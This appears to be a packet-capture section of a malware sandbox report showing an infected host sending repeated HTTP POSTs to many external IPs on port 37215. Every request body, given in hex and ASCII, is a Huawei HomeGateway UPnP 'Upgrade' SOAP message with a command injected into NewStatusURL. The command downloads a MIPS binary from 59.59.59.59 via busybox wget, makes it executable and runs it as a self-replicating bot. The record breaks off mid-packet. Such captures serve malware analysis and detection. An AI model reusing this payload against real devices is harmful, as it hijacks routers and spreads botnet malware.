                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1153192.168.2.1542188197.176.205.15237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.746140957 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1154192.168.2.1546104157.108.37.4137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.746145010 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1155192.168.2.1546966197.212.194.10037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.746177912 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1156192.168.2.1547838157.205.214.1137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.746371984 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1157192.168.2.155804041.65.158.15037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.746398926 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1158192.168.2.154017086.191.251.4237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.712021112 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1159192.168.2.1539012197.56.7.17537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.712052107 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1160192.168.2.1533008197.100.187.19737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.725296021 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1161192.168.2.1541184197.235.45.7437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.725316048 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1162192.168.2.1533930157.103.156.13837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.725636005 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 